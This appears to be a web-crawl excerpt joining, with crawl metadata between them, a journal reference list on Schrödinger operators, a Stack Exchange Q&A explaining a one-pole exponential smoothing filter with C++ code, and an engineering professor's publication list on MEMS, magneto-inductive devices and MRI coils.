Essential self-adjointness of Schrödinger operators with singular potentials,, \emph{Arch. Rational Mech. Anal.}, 52 (1973), 44. Google Scholar
show all references
##### References:
[1] A. Canale, A. Rhandi and C. Tacelli, Schrödinger type operators with unbounded diffusion and potential terms,, \emph{Ann. Scuola Norm. Sup. Pisa Cl. Sci.}, (). Google Scholar [2] P. Baras and J. A. Goldstein, The heat equation with a singular potential,, \emph{Trans. Am. Math. Soc.}, 284 (1984), 121. doi: 10.2307/1999277. Google Scholar [3] T. Durante and A. Rhandi, On the essential self-adjointness of Ornstein-Uhlenbeck operators perturbed by inverse-square potentials,, \emph{Discrete Cont. Dyn. Syst. S.}, 6 (2013), 649. Google Scholar [4] D. E. Edmunds and W. E. Evans, Spectral Theory and Differential Operators,, Clarendon Press, (1987). Google Scholar [5] K. J. Engel and R. Nagel, One-Parameter Semigroups for Linear Evolution Equations,, Springer-Verlag, (2000). Google Scholar [6] S. Fornaro and L. Lorenzi, Generation results for elliptic operators with unbounded diffusion coefficients in $L^p$- and $C_b$-spaces,, \emph{Discrete Contin. Dyn. Syst.}, 18 (2007), 747. doi: 10.3934/dcds.2007.18.747. Google Scholar [7] S. Fornaro and A. Rhandi, On the Ornstein Uhlenbeck operator perturbed by singular potentials in $L^p$-spaces,, \emph{Discrete Contin. Dyn. Syst.}, 33 (2013), 5049. Google Scholar [8] D. Gilbarg and N. Trudinger, Elliptic Partial Differential Equations of Second Order,, Springer, (1983). doi: 10.1007/978-3-642-61798-0. Google Scholar [9] L. Lorenzi and A. Rhandi, On Schrödinger type operators with unbounded coefficients: generation and heat kernel estimates,, \emph{J. Evol. Equ.}, 15 (2015), 53. doi: 10.1007/s00028-014-0249-z. Google Scholar [10] G. Metafune and C. Spina, An integration by parts formula in Sobolev spaces,, \emph{Mediterranean Journal of Mathematics}, 5 (2008), 357. doi: 10.1007/s00009-008-0155-0. Google Scholar [11] G. Metafune and C. Spina, Elliptic operators with unbounded diffusion coefficients in $L^p$ spaces,, \emph{Ann. Scuola Norm. Sup. Pisa Cl. Sci.}, XI (2012), 303. Google Scholar [12] G. Metafune, N. Okazawa, M. Sobajima and C. Spina, Scale invariant elliptic operators with singular coefficients,, \emph{J. Evol. Equ.}, 16 (2016), 391. doi: 10.1007/s00028-015-0307-1. Google Scholar [13] E. Mitidieri, A simple approach to Hardy inequalities,, \emph{Mat. Zametki}, 67 (2000), 563. doi: 10.1007/BF02676404. Google Scholar [14] R. Nagel (ed.), One-Parameter Semigroups of Positive Operators,, Lecture Notes in Math. \textbf{1184}, 1184 (1986). doi: 10.1007/BFb0074922. Google Scholar [15] N. Okazawa, On the perturbation of linear operators in Banach and Hilbert spaces,, \emph{J. Math. Soc. Japan}, 34 (1982), 677. doi: 10.2969/jmsj/03440677. Google Scholar [16] N. Okazawa, $L^p$-theory of Schrödinger operators with strongly singular potentials,, \emph{Japan. J. Math.}, 22 (1996), 199. Google Scholar [17] E. M. Ouhabaz, Analysis of Heat Equations on Domains,, London Math. Soc. Monographs \textbf{31}, 31 (2004). Google Scholar [18] M. Reed and B. Simon, Methods of Modern Mathematical Physics II: Fourier Analysis, Self-Adjointness,, Academic Press, (1975). Google Scholar [19] B. Simon, Essential self-adjointness of Schrödinger operators with singular potentials,, \emph{Arch. Rational Mech. Anal.}, 52 (1973), 44. Google Scholar
[1] Jiří Neustupa. On $L^2$-Boundedness of a $C_0$-Semigroup generated by the perturbed oseen-type operator arising from flow around a rotating body. Conference Publications, 2007, 2007 (Special) : 758-767. doi: 10.3934/proc.2007.2007.758 [2] Yu-Xia Liang, Ze-Hua Zhou. Supercyclic translation $C_0$-semigroup on complex sectors. Discrete & Continuous Dynamical Systems - A, 2016, 36 (1) : 361-370. doi: 10.3934/dcds.2016.36.361 [3] Fabrice Planchon, John G. Stalker, A. Shadi Tahvildar-Zadeh. Dispersive estimate for the wave equation with the inverse-square potential. Discrete & Continuous Dynamical Systems - A, 2003, 9 (6) : 1387-1400. doi: 10.3934/dcds.2003.9.1387 [4] Jacek Banasiak, Marcin Moszyński. Hypercyclicity and chaoticity spaces of $C_0$ semigroups. Discrete & Continuous Dynamical Systems - A, 2008, 20 (3) : 577-587. doi: 10.3934/dcds.2008.20.577 [5] Hengguang Li, Jeffrey S. Ovall. A posteriori eigenvalue error estimation for a Schrödinger operator with inverse square potential. Discrete & Continuous Dynamical Systems - B, 2015, 20 (5) : 1377-1391. doi: 10.3934/dcdsb.2015.20.1377 [6] José A. Conejero, Alfredo Peris. Hypercyclic translation $C_0$-semigroups on complex sectors. Discrete & Continuous Dynamical Systems - A, 2009, 25 (4) : 1195-1208. doi: 10.3934/dcds.2009.25.1195 [7] Boumediene Abdellaoui, Fethi Mahmoudi. An improved Hardy inequality for a nonlocal operator. Discrete & Continuous Dynamical Systems - A, 2016, 36 (3) : 1143-1157. doi: 10.3934/dcds.2016.36.1143 [8] Daniel N. Dore, Andrew D. Hanlon. Area preserving maps on $\boldsymbol{S^2}$: A lower bound on the $\boldsymbol{C^0}$-norm using symplectic spectral invariants. Electronic Research Announcements, 2013, 20: 97-102. doi: 10.3934/era.2013.20.97 [9] Gisèle Ruiz Goldstein, Jerome A. Goldstein, Abdelaziz Rhandi. Kolmogorov equations perturbed by an inverse-square potential. Discrete & Continuous Dynamical Systems - S, 2011, 4 (3) : 623-630. doi: 10.3934/dcdss.2011.4.623 [10] Ronald E. Mickens. Positivity preserving discrete model for the coupled ODE's modeling glycolysis. Conference Publications, 2003, 2003 (Special) : 623-629. doi: 10.3934/proc.2003.2003.623 [11] Fabrice Planchon, John G. Stalker, A. Shadi Tahvildar-Zadeh. $L^p$ Estimates for the wave equation with the inverse-square potential. Discrete & Continuous Dynamical Systems - A, 2003, 9 (2) : 427-442. doi: 10.3934/dcds.2003.9.427 [12] Jian Zhang, Wen Zhang, Xianhua Tang. Ground state solutions for Hamiltonian elliptic system with inverse square potential. Discrete & Continuous Dynamical Systems - A, 2017, 37 (8) : 4565-4583. doi: 10.3934/dcds.2017195 [13] Kazuhiro Ishige, Asato Mukai. Large time behavior of solutions of the heat equation with inverse square potential. Discrete & Continuous Dynamical Systems - A, 2018, 38 (8) : 4041-4069. doi: 10.3934/dcds.2018176 [14] Rowan Killip, Changxing Miao, Monica Visan, Junyong Zhang, Jiqiang Zheng. The energy-critical NLS with inverse-square potential. Discrete & Continuous Dynamical Systems - A, 2017, 37 (7) : 3831-3866. doi: 10.3934/dcds.2017162 [15] Patrick Martinez, Judith Vancostenoble. The cost of boundary controllability for a parabolic equation with inverse square potential. Evolution Equations & Control Theory, 2019, 8 (2) : 397-422. doi: 10.3934/eect.2019020 [16] Adam Bobrowski, Adam Gregosiewicz, Małgorzata Murat. Functionals-preserving cosine families generated by Laplace operators in C[0,1]. Discrete & Continuous Dynamical Systems - B, 2015, 20 (7) : 1877-1895. doi: 10.3934/dcdsb.2015.20.1877 [17] Sallah Eddine Boutiah, Abdelaziz Rhandi, Cristian Tacelli. Kernel estimates for elliptic operators with unbounded diffusion, drift and potential terms. Discrete & Continuous Dynamical Systems - A, 2019, 39 (2) : 803-817. doi: 10.3934/dcds.2019033 [18] Daniele Cassani, Bernhard Ruf, Cristina Tarsi. On the capacity approach to non-attainability of Hardy's inequality in $\mathbb{R}^N$. Discrete & Continuous Dynamical Systems - S, 2019, 12 (2) : 245-250. doi: 10.3934/dcdss.2019017 [19] Zaihui Gan. Cross-constrained variational methods for the nonlinear Klein-Gordon equations with an inverse square potential. Communications on Pure & Applied Analysis, 2009, 8 (5) : 1541-1554. doi: 10.3934/cpaa.2009.8.1541 [20] Xiaoyan Lin, Yubo He, Xianhua Tang. Existence and asymptotic behavior of ground state solutions for asymptotically linear Schrödinger equation with inverse square potential. Communications on Pure & Applied Analysis, 2019, 18 (3) : 1547-1565. doi: 10.3934/cpaa.2019074
2018 Impact Factor: 0.925 | 2020-01-25 20:24:09 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7895963788032532, "perplexity": 10451.355462194168}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-05/segments/1579251681412.74/warc/CC-MAIN-20200125191854-20200125221854-00071.warc.gz"} |
https://dsp.stackexchange.com/questions/33858/how-does-this-simple-filter-work/33862 | # How does this “simple filter” work?
I'm new to DSP, and I'm using this basic "1-pole LPF" Param Smooth filter which "smooth" param when I change it. The code is pretty simple:
class CParamSmooth
{
public:
double a, b, z;
CParamSmooth() {
a = 0.8;
b = 1. - a;
z = 0.;
}
double Process(double in) {
z = (in * b) + (z * a);
return z;
}
};
If I try some values with "strong" a coefficients, I can see that it starts heavy on increment, then becomes smooth till "rounding" happen, setting z = in:
0 | 0.16
1 | 0.288
2 | 0.3904
3 | 0.47232
4 | 0.537856
5 | 0.590285
6 | 0.632228
7 | 0.665782
8 | 0.692626
9 | 0.714101
10 | 0.731281
11 | 0.745024
12 | 0.75602
13 | 0.764816
14 | 0.771853
15 | 0.777482
16 | 0.781986
17 | 0.785588
18 | 0.788471
19 | 0.790777
20 | 0.792621
21 | 0.794097
22 | 0.795278
23 | 0.796222
24 | 0.796978
25 | 0.797582
26 | 0.798066
27 | 0.798453
28 | 0.798762
29 | 0.79901
30 | 0.799208
31 | 0.799366
32 | 0.799493
33 | 0.799594
34 | 0.799675
35 | 0.79974
36 | 0.799792
37 | 0.799834
38 | 0.799867
39 | 0.799894
40 | 0.799915
41 | 0.799932
42 | 0.799946
43 | 0.799956
44 | 0.799965
45 | 0.799972
46 | 0.799978
47 | 0.799982
48 | 0.799986
49 | 0.799989
50 | 0.799991
51 | 0.799993
52 | 0.799994
53 | 0.799995
54 | 0.799996
55 | 0.799997
56 | 0.799998
57 | 0.799998
58 | 0.799998
59 | 0.799999
60 | 0.799999
61 | 0.799999
62 | 0.799999
63 | 0.799999
64 | 0.8
65 | 0.8
66 | 0.8
...
So, basically, each iteration is a sum of 0.16 + prev z * 0.8. And here is where I don't understand: why 0.16 + prev z * 0.8 can't go "over" 0.8?
In fact, this become stable when z = in. Without rounding, z will always be < in. Why it can't go > in?
It's a sum on each iteration... who limits it?
• You might want to try to compute the values by hand, drawing them on an axis one by one. Each iteration is computing a weighted mean between the previous result and the input, and with constant input it can be easy to get why you can't cross it. – TonioElGringo Aug 24 '16 at 12:56
In more standard DSP terms, you have the following filter:
$$y[n] = (1-a) x[n] + a y[n-1]$$
where $x[n]$ and $y[n]$ are the input and output signals at time $n$ respectively.
The transfer function (which you didn't ask for) is:
$$H(z) = \frac{1-a}{1 - az^{-1}}$$
so here is your single pole, at $z=a$ in the complex plane. This filter is also known as exponential smoothing, exponential moving average (EMA), or exponentially weighted moving average (EWMA).
The infinite impulse response is $h[n] = (1-a) u[n] a^n$. In layman terms, when the input signal is 0 except for $x[0]=1$, the output signal is an exponential $(1-a) \times a^n$ starting at $n=0$.
What you want is the step response (i.e. what happens if the input signal is a constant $K$ starting at time $n=0$).
In this case, the output signal is the convolution $h \star Ku$ of the impulse response and the step signal. This is (for time $n \ge 0$):
$$y[n] = \sum_{k=0}^{k=n} K \times h[k] = K(1-a) \sum_{k=0}^{k=n} a^k = K(1-a)\frac{1-a^{n+1}}{1-a} = K (1-a^{n+1})$$
As the time $n$ grows, $a^{n+1}$ vanishes, and the step response grows monotonically to its limit value $y = K$, which is the value of the input signal.
This is what you get in your simulation.
• I dared to add a few more common names for this filter, to help find literature. Corrections welcome – Laurent Duval Aug 24 '16 at 11:49
• Beautiful answer ! – Gilles Aug 24 '16 at 12:27
• Thanks for the answer! Well, for step: "This filter is also known as exponential smoothing, exponential moving average (EMA), or exponentially weighted moving average (EWMA)." The formula you have put (y[n] = (1−a)*x[n] + a*y[n−1]) is like my formula, but the one on the wiki is different: its y[n] = a*x[n] + (1-a)*y[n-1]. Why? – markzzz Aug 24 '16 at 12:30
• @markzzz The difference is just in how you name your parameters. In the answer above, the exponent is a. In the wikipedia article notation, the exponent is (1-a_wiki). – Juancho Aug 24 '16 at 12:45
• Right! Thanks! So basically, the formula become z = in - (in - z)*a and it subtracts from in (step by step) an amount smaller at each step, till at some points (due to computer rounding) (in - z)*a become 0, so in. Is it right? If it wasn't "rounding", it really was a "infinite response", without returning in...! Not sure if that's correct anyway hehehe – markzzz Aug 24 '16 at 12:52 | 2020-08-03 15:43:48 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.6183897256851196, "perplexity": 1502.4016886605032}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 5, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-34/segments/1596439735812.88/warc/CC-MAIN-20200803140840-20200803170840-00068.warc.gz"} |
https://www.imperial.ac.uk/people/r.syms/publications.html | # ProfessorRichardSyms
Faculty of EngineeringDepartment of Electrical and Electronic Engineering
Professor
//
### Contact
+44 (0)20 7594 6203r.syms
//
### Location
702Electrical EngineeringSouth Kensington Campus
//
## Publications
Publication Type
Year
to
362 results found
Syms R, Noorwali A, 2022, Polyphase codes for multiplexed acoustic signalling and sensing on pipes, Smart Materials and Structures, Vol: 31, ISSN: 0964-1726
Transmission of acoustic signals between distributed sensor nodes may be useful for status monitoring of elongated structures such as pipelines. In principle, coded signals can be used in an asynchronous multiplexed system, provided the signals are distinguishable. However, multimode effects complicate signal propagation, so any such codes should be short. A search for polyphase code families with properties suitable for acoustic code division multiple access is presented. Algorithms for reduction of search space to allow use of a laptop for code discovery are described. Short codes of base 6 are shown to outperform codes of bases 2, 3, 4 and sets suitable for systems with 2 and 3 users are identified. The codes have similar properties to Barker codes but larger sidelobes. Their use is demonstrated by simulation and experiment at kHz frequencies using an air-filled copper pipe, an electromagnetic acoustic transducer (EMAT) and a microphone designed to excite and detect the $L\left( {0,1} \right)$ mode. Low loss propagation over 25 m is achieved with a 20 kHz carrier. Excellent agreement between experiment and theory is demonstrated, with performance limited by transducer bandwidth.
Journal article
Voronov A, Syms RRA, Sydoruk O, 2022, High-performance magnetoinductive directional filters, Electronics, Vol: 11, Pages: 1-16, ISSN: 1450-5843
Multiport magnetoinductive (MI) devices with directional filter properties are presented. Design equations are developed and solved using wave analysis and dispersion theory, and it is shown that high-performance directional filters can be realised for use both in MI systems with complex, frequency-dependent impedance and in conventional systems with real impedance. Wave analysis is used to reduce the complexity of circuit equations. High-performance MI structures combining directional and infinite rejection filtering are demonstrated, as well as multiple-passband high-rejection filtering. A new method for improving filtering performance through multipath loss compensation is described. Methods for constructing tuneable devices using toroidal ferrite-cored transformers are proposed and demonstrated, and experimental results for tuneable MI directional filters are shown to agree with theoretical models. Limitations are explored, and power handling sufficient for HF RFID applications is demonstrated, despite the use of ferrite materials.
Journal article
Syms R, Liu D, 2022, Buckling Electrothermal NEMS Actuators: Analytic Design for Very Slender Beams, Micro, Vol: 2, Pages: 54-67
<jats:p>Analytic approximations are presented for the response of buckling-mode electrothermal actuators with very slender beams with a width-to-length ratio of W/L≤0.001 of the type found in nanoelectromechanical systems (NEMS). The results are found as closed-form solutions to the Euler beam bending theory rather than by an iterative numerical solution or a time-consuming finite element analysis. Expressions for transverse deflections and stiffness are presented for actuators with the common raised cosine and chevron pre-buckled shapes. The approximations are valid when the effects of bending dominate over those of axial compression. A few higher-order approximations are also presented for less slender beams with 0.001≤W/L≤0.01.</jats:p>
Journal article
Syms RRA, Voronov A, Sydoruk O, 2022, HF RFID Tag Location Using Magneto-Inductive Waves, IEEE JOURNAL OF RADIO FREQUENCY IDENTIFICATION, Vol: 6, Pages: 347-354
Journal article
Syms R, Bouchaala A, 2021, Mechanical Synchronization of MEMS Electrostatically Driven Coupled Beam Filters, MICROMACHINES, Vol: 12
Journal article
Syms R, Sydoruk O, Wiltshire M, 2021, Magneto-inductive HF RFID system, International Journal of Radio Frequency Identification Technology and Applications, Vol: 5, Pages: 148-153, ISSN: 1745-3216
Efforts to increase read range in passive HF RFID systems are hampered by the poor range scaling law of inductive coupling. An alternative approach to enlarging capture volume—increasing the lateral extent of the antenna—is proposed, using a magneto-inductive (MI) travelling wave arrangement to allow larger antenna sizes. A theory of load modulation in MI systems is first presented, together with field simulations in the capture volume. A 2.3 metre-long MI antenna is then constructed, and an active tag emulator is used to demonstrate load modulation. RFID is then demonstrated, with the antenna in both reflection and transmission modes, using a custom reader constructed from laboratory equipment. A transverse read range of 0.5 m is obtained using commercial off-the-shelf RFID cards with 12 W RF power, with high uniformity along the length of the antenna.
Journal article
Voronov A, Sydoruk O, Syms RRA, 2021, Power waves and scattering parameters in magneto-inductive systems, AIP ADVANCES, Vol: 11
Journal article
Wright S, Syms R, 2021, Shock-free ion transmission in a skimmer-based MEMS mass spectrometer vacuum interface, Journal of Micromechanics and Microengineering, Vol: 31, ISSN: 0960-1317
Shock-free ion transmission from atmospheric pressure to a MEMS-based mass spectrometer has been achieved using micro-engineered nickel skimmers. The signal level has increased 70-fold compared with a previous configuration in which the skimmer did not sample the supersonic flow. The skimmers are formed by electroplating internal surfaces of anisotropically etched, pyramidal holes in (100) silicon. Etching from the reverse of the wafer exposes free- standing, open-ended skimmers supported by remaining silicon. High-resolution schlieren imaging has been used to visualise gas flow within the interface. Signal enhancement and increased gas throughput are observed when the skimmer attaches to the supersonic gas expansion via oblique shocks. The silicon back wall interacts with the flow field, causing the free jet Mach disc to evolve into a bowl-shaped surface shock whose position asymptotically approaches a stand-off separation as the interface pressure decreases. Ideally, the skimmer entrance should be located approximately midway between the inlet and the back wall. This development should allow a sensitivity increase in MEMS mass spectrometers using pumps of moderate capacity.
Journal article
Bouchaala A, Syms R, 2020, New architectures for micromechanical coupled beam array filters, Microsystem Technologies: micro and nanosystems information storage and processing systems, Vol: 27, Pages: 3377-3387, ISSN: 0946-7076
Coupled resonator filters implemented as microelectromechanical systems (MEMS) offer performance advantages as band-pass filters at MHz frequencies. Here new designs based on resonant cavities for acoustic slow waves are developed to allow alternative frequency responses. Derivation of the lumped element model for coupled beam systems with in-plane motion from Rayleigh–Ritz perturbation theory is first reviewed. Departures from ideal behaviour caused by mechanical and electrostatic detuning are resolved. Slow wave theory is then used to develop linear array topologies with novel responses including band-stop and comb filtering with controlled filter roll-off. A systematic procedure is developed to allow rapid identification of design parameters without the need for lengthy numerical simulation, using the lumped element, stiffness matrix and finite element methods to investigate the layout parameters of initial design concepts, detailed mechanical effects and detailed electrostatic effects, respectively. High performance is demonstrated, with good agreement between the models.
Journal article
Syms R, Khuntikeo N, Titapun A, Chamadol N, Boonphongsathien W, Sa-Ngiamwibool P, Taylor-Robinson S, Wadsworth C, Zhang S, Kardoulaki Eet al., 2020, In vitro intraductal MRI and T2 mapping of cholangiocarcinoma using catheter coils, Hepatic Medicine : Evidence and Research, Vol: 2020, Pages: 107-114, ISSN: 1179-1535
Aim: Diagnostic imaging of early-stage cholangiocarcinoma is challenging. A previous in vitro study of fixed-tissue liver resection specimens investigated T2 mapping as a method of exploiting the locally increased signal-to-noise ratio (SNR) of duodenoscope coils for improved quantitative magnetic resonance imaging (MRI), despite their non-uniform sensitivity. This work applies similar methods to unfixed liver specimens using catheter-based receivers.Methods: Ex vivo intraductal MRI and T2 mapping were carried out at 3T on unfixed resection specimens obtained from cholangiocarcinoma patients immediately after surgery using a catheter coil based on a thin-film magneto-inductive waveguide, inserted directly into an intrahepatic duct.Results: Polypoid intraductal cholangiocarcinoma was imaged using fast spin echo sequences. High resolution T2 maps were extracted by fitting of data obtained at different echo times to mono-exponential models, and disease-induced changes were correlated with histopathology. An increase in T2 was found compared with fixed specimens and differences in T2 allowed the resolution of tumour tissue and malignant features such as polypoid morphology.Conclusions: Despite their limited field of view, useful data can be obtained using catheter coils, and T2 mapping offers an effective method of exploiting their local SNR advantage without the need for image correction.
Journal article
Khuntikeo N, Titapun A, Chamadol N, Boonphongsathien W, Sa-Ngiamwibool P, Taylor-Robinson SD, Wadsworth CA, Zhang S, Kardoulaki EM, Young IR, Syms RRet al., 2020, Improving the detection of cholangiocarcinoma: in vitro MRI-based study using local coils and T2 mapping, Hepatic Medicine : Evidence and Research, Vol: 12, Pages: 29-39, ISSN: 1179-1535
Aim: Cholangiocarcinoma is endemic in southeast Asia, generally developing from liver fluke infestation. However, diagnostic imaging of early-stage disease is challenging. The aim of this work is to investigate relaxometry (specifically, T2 mapping) as a method of exploiting the higher signal-to-noise ratio (SNR) of internal coils for improved reception of magnetic resonance signals, despite their non-uniform sensitivity.Methods: Ex vivo T2 mapping was carried out at 3T on fixed resection specimens from Thai cholangiocarcinoma patients using an mGRASE sequence and an endoscope coil based on a thin-film magneto-inductive waveguide and designed ultimately for internal use.Results: Disease-induced changes including granulomatous inflammation, intraepithelial neoplasia and intraductal tumours were correlated with histopathology, and relaxation data were compared with mono- and bi-exponential models of T2 relaxation. An approximately 10-fold local advantage in SNR compared to a 16-element torso coil was demonstrated using the endoscope coil, and improved tissue differentiation was obtained without contrast agents.Conclusion: The performance advantage above follows directly from the inverse relation between the component of the standard deviation of T2 due to thermal noise and the SNR, and offers an effective method of exploiting the SNR advantage of internal coils. No correction is required, avoiding the need for tracking, relaxing constraints on coil and slice orientation and providing rapid visualization.
Journal article
Alsaleh M, Barbera TA, Andrews RH, Sithithaworn P, Khuntikeo N, Loilome W, Yongvanit P, Cox IJ, Syms RRA, Holmes E, Taylor-Robinson SDet al., 2019, Mass spectrometry: A guide for the clinician, Journal of Clinical and Experimental Hepatology, Vol: 9, Pages: 597-606, ISSN: 0973-6883
Metabolic profiling, metabonomics and metabolomics are terms coined in the late 1990s as they emerged as the newest ‘omics’ technology at the time. This line of research enquiry uses spectroscopic analytical platforms, which are mainly nuclear magnetic resonance spectroscopy and mass spectrometry (MS), to acquire a snapshot of metabolites, the end products of a complex biological system. Metabolic profiling enables the detection, quantification and characterisation of metabolites in biofluids, cells and tissues. The source of these compounds can be of endogenous, microbial or exogenous origin, such as dietary or xenobiotic. This results in generating extensive, multivariate spectroscopic data that require specific statistical manipulation, typically performed using chemometric and pattern recognition techniques to reduce its dimensions, facilitate its biological interpretation and allow sample classification and biomarker discovery. Consequently, it is possible to study the dynamic metabolic changes in response to disease, intervention or environmental conditions. In this review, we describe the fundamentals of MS so that clinicians can be literate in the field and are able to interrogate the right scientific questions.
Journal article
Syms RRA, Sydoruk O, Bouchaala A, 2019, Improved optical imaging of high aspect ratio nanostructures using dark-field microscopy, Nanotechnology, Vol: 30, ISSN: 0957-4484
Improvements to white light optical imaging of widely spaced, high aspect ratio nanostructures are demonstrated using dark-field field microscopy. 1D models of bright- and dark-field imaging are developed from rigorous modal diffraction theory by assuming that features are periodic. A simple model is developed to explain dark field results and simulated line images obtained using the two modalities are compared for different dimensions and materials. Increased contrast between etched features and the substrate is demonstrated in dark field, due to its reduced sensitivity to scattering from flat areas. The results are verified using silicon nanostructures fabricated by sidewall transfer lithography, and feature separation with improved tolerance to apparent substrate brightness is demonstrated during image segmentation using the Otsu method.
Journal article
Alsaleh M, Leftley Z, Barbera T, Sithithaworn P, Khuntikeo N, Loilome W, Yongvanit P, Cox IJ, Chamadol N, Syms R, Andrews R, Taylor-Robinson Set al., 2018, Cholangiocarcinoma: a guide for the nonspecialist, International Journal of General Medicine, Vol: 12, Pages: 13-23, ISSN: 1178-7074
Cholangiocarcinoma (CCA) is a tumor with increasing prevalence around the world. The prevalence of CCA is highest in East Asia and most significantly in the countries through which the Mekong River flows, owing to the presence of liver flukes, which are consumed in raw fish dishes. Outside Asia, the causes of bile duct cancers for the most part are unknown. In this review, we assess the current state of knowledge in both fluke-associated and sporadic CCA, from etiological, diagnostic, and treatment perspectives.
Journal article
Syms RRA, Bouchaala A, Sydoruk O, Liu Det al., 2018, Optical imaging and image analysis for high aspect ratio NEMS, Journal of Micromechanics and Microengineering, Vol: 29, ISSN: 0960-1317
A strategy for optical microscopy of high-aspect-ratio (HAR) nanoelectromechanical systems (NEMS) that combine large feature spacing and large height with sub-wavelength width is presented. Line images are simulated using a 2D model of incoherent imaging based on modal diffraction theory. Beyond a sufficient depth, it is shown that sub-wavelength features appear as dark lines, while wider features are visible as their edges. The results suggest NEMS and MEMS may be separated from background in images by detection of valleys in brightness. Results are confirmed by imaging of Si NEMS containing 100 nm wide features in a bright-field microscope. Algorithms for separation of NEMS, MEMS and background in microscope images based on valley detection, thresholding and masking are demonstrated.
Journal article
Wright S, Syms RRA, 2018, Supersonic jet interactions with a micro-engineered skimmer, Journal of Micromechanics and Microengineering, Vol: 28, ISSN: 0960-1317
A micro-engineered, skimmer-based vacuum interface has been demonstrated and used to investigate gas dynamics on a sub-millimeter length scale. The interface is fabricated as a stacked assembly of silicon dies, based on an anisotropically etched inlet orifice and a pyramidal skimmer cone formed in electroplated nickel. Expansion of gas into vacuum, interaction of a supersonic jet with the skimmer and transmission of a collimated beam into a second vacuum stage have all been imaged with a schlieren microscope. Using a glass-walled vacuum chamber, flow patterns upstream and fully downstream of the skimmer have been imaged together for the first time. At low first-stage pressures, the 150–200 µm tall skimmers cannot fully penetrate the shock arising from interaction of the jet with the back wall. However, as the pressure is increased, a multiple shock cell structure evolves, the jet narrows and transmission rises sharply. Eventually, a collimated beam is transmitted to the second stage. When the skimmer aperture is smaller than the source aperture, a series of distinct peaks is evident in a plot of transmission against first-stage pressure. Imaging shows that at each successive peak, the number of shock cells increases by one and the skimmer inlet is coincident with a node.
Journal article
Wiltshire MCK, Syms RRA, 2018, Measuring noise in microwave metamaterials, JOURNAL OF APPLIED PHYSICS, Vol: 123, ISSN: 0021-8979
Electromagnetic metamaterials are artificially constructed media composed of arrays of electrical circuits that can exhibit electric and magnetic characteristics unlike those of any conventional materials. However, the materials are lossy and hence noisy, so that the signal-to-noise ratio in practical situations is greatly reduced. In particular, operating in the double negative region, where both the permittivity and the permeability are negative so that the refractive index is real but negative, incurs significant loss and noise penalties. In this work, we report noise measurements on a double negative metamaterial at microwave frequencies and compare them with the results of a simple model based on a transmission line loaded with lossy elements that mimic the split ring resonators and fine wires of the metamaterial. A noise source is associated with the resistive part of each element, and these are added incoherently to predict the total noise spectrum of the metamaterial. The theoretical results are in good agreement with the measurements. In particular, we find that the measured noise spectrum has contributions from both electric and magnetic noise, but is dominated by the magnetic noise. This limits possible applications, even with optimised materials, to functions that cannot be realised by conventional means.
Journal article
Kamel H, Syms RRA, Kardoulaki EM, Rea Met al., 2018, Surgical wound monitoring by MRI with a metamaterial-based implanted local coil, EPJ Applied Metamaterials, Vol: 5, ISSN: 2272-2394
An implantable sensor for monitoring surgical wounds after bowel reconstruction is proposed. The sensor consists of a coupled pair of 8-element magneto-inductive ring resonators, designed for mounting on a biofragmentable anastomosis ring to give a local increase in signal-to-noise ratio near an annular wound during 1H magnetic resonance imaging. Operation on an anti-symmetric spatial mode is used to avoid coupling to the B1 field during excitation, and a single wired connection is used for MRI signal output. The electrical response and field-of-view are estimated theoretically. Prototypes are constructed from flexible elements designed for operation at 1.5 T, electrical responses are characterized and local SNR enhancement is confirmed using agar gel phantoms.
Journal article
Syms RRA, Kardoulaki E, Rea M, Choonee K, Taylor-Robinson S, Wadsworth C, Young IRet al., 2017, Magneto-inductive magnetic resonance imaging duodenoscope, Progress in Electromagnetics Research (PIER), Vol: 159, Pages: 125-138, ISSN: 1070-4698
A magnetic resonance imaging (MRI) duodenoscope is demonstrated, by combining non-magnetic endoscope components with a thin-film receiver based on a magneto-inductive waveguide.The waveguide elements consist of figure-of-eight shaped inductors formed on either side of a flexiblesubstrate and parallel plate capacitors that use the substrate as a dielectric. Operation is simulatedusing equivalent circuit models and by computation of two- and three-dimensional sensitivity patterns.Circuits are fabricated for operation at 127.7 MHz by double-sided patterning of copper-clad Kaptonand assembled onto non-magnetic flexible endoscope insertion tubes. Operation is verified by benchtesting and by1H MRI at 3T using phantoms. The receiver can form a segmented coaxial image alongthe length of the endoscope, even when bent, and shows a signal-to-noise-ratio advantage over a surfacearray coil up to three times the tube diameter at the tip. Initial immersion imaging experiments havebeen carried out and confirm an encouraging lack of sensitivity to RF heating.
Journal article
Syms RRA, Kardoulaki E, Rea M, Taylor-Robinson S, Wadsworth C, Young IRet al., 2017, Metamaterial Magnetic Resonance Imaging Endoscope, 2017 11th International Congress on Engineered Material Platforms for Novel Wave Phenomena (METAMATERIALS), Publisher: IEEE, Pages: 337-339
Conference paper
